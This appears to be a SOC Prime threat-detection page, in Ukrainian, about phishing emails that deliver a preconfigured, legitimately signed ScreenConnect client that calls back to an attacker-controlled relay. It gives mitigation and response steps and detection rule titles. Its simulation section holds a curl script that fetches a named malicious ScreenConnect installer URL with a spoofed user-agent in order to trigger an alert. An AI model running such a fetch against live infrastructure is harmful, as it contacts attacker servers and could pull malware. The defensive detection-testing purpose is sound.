SOC Prime Bias: Medium

05 Oct 2026 17:02 UTC

ScreenConnect Client зловжито для несанкціонованого віддаленого доступу

Author Photo
SOC Prime Team linkedin icon Стежити
ScreenConnect Client зловжито для несанкціонованого віддаленого доступу
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисники використовують фішингові електронні листи для розповсюдження легітимного, попередньо налаштованого клієнта ScreenConnect. Інструмент для віддаленого моніторингу та управління (RMM) встановлює з’єднання зворотного виклику з екземпляром, контрольованим зловмисником, надаючи віддалений доступ до скомпрометованих систем. Кампанія зловживає довірливою природою легітимного програмного забезпечення, щоб ухилятися від основних засобів безпеки та механізмів виявлення.

Розслідування

Слідчий досліджував фішинговий електронний лист, який містив посилання для доставки файлу PE. Аналіз підтвердив, що файл був легітимним, цифрово підписаним клієнтом ScreenConnect. Однак, його вбудована конфігурація була змінена для підключення до конкретного екземпляра ретрансляції та ідентифікатора екземпляра, контрольованого загрозливим актором.

Пом’якшення

Браузери можуть блокувати завантаження виконуваних файлів як початковий шар захисту. Організації повинні контролювати несанкціоноване використання інструментів RMM та забезпечити жорсткий контроль над виконуваними файлами, завантаженими з ненадійних веб-посилань. Дозволений перелік застосунків також може допомогти запобігти виконанню несанкціонованих клієнтів ScreenConnect та іншого непідтримуваного програмного забезпечення RMM.

Реагування

Коли виявлено зловмисну діяльність, ізолюйте постраждалий кінцевий пристрій, щоб запобігти подальшому віддаленому доступу зловмисника. Визначте та заверште всі активні процеси ScreenConnect. Проведіть судово-медичний огляд конфігурації клієнта для визначення команди та управління інфраструктурою зловмисника та визначення масштабів несанкціонованого доступу до скомпрометованої системи.

Потік атаки

Ми все ще оновлюємо цю частину.

Виявлення

Альтернативне програмне забезпечення для віддаленого доступу / управління (через створення процесу)

Команда SOC Prime
05 жовтня 2026

Можлива активність командного та контрольного центру через спробу комунікації домену програмного забезпечення віддаленого доступу (через DNS)

Команда SOC Prime
05 жовтня 2026

Розповсюдження шкідливого ПЗ клієнта ScreenConnect через фішинговий імейл [HTTP-проксі]

Правила AI SOC Prime
05 жовтня 2026

Виконання симуляції

  • Наратив атаки та команди: Противник прагне встановити зберігання на цільовій робочій станції, розповсюджуючи ScreenConnect через фішингову кампанію. У цій симуляції ми повторюємо кінцевий етап: машина жертви, що здійснює вихідний HTTP-запит до скомпрометованого/зловмисного домену для завантаження виконуваного файлу налаштування. Щоб імітувати специфічну поведінку, ідентифіковану в розвідці загроз, “атакуючий” використовує нестандартний рядок User-Agent ScreenConnect запитуючи конкретний шлях до файлу thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe. Це активізує правило виявлення на основі проксі.

  • Скрипт регресійного тестування:

    # Цей скрипт використовує curl для моделювання зловмисного запиту на завантаження, ідентифікованого в правилі виявлення.
    # Він використовує специфічний URL та специфічний User-Agent, необхідний для активізації сповіщення.
    
    TARGET_URL="http://thelittlecupandsaucer.com.au/ScreenConnect.ClientSetup.exe"
    MALICIOUS_UA="ScreenConnect"
    
    echo "[*] Симуляція спроби завантаження ScreenConnect..."
    echo "[*] URL: $TARGET_URL"
    echo "[*] User-Agent: $MALICIOUS_UA"
    
    # Ми використовуємо -k, щоб ігнорувати помилки SSL, якщо змодельований домен використовує самопідписаний сертифікат,
    # і -A для встановлення специфічного User-Agent.
    curl -k -A "$MALICIOUS_UA" "$TARGET_URL" -o /dev/null
    
    echo "[*] Команда симуляції відправлена."
  • Команди очистки:

    # Ніякі файли насправді не були завантажені на хост під час симуляції (перенаправлено на /dev/null).
    # Зміни в системі не були зроблені.
    echo "[*] Очистка завершена. Жодних слідів на хості не залишено."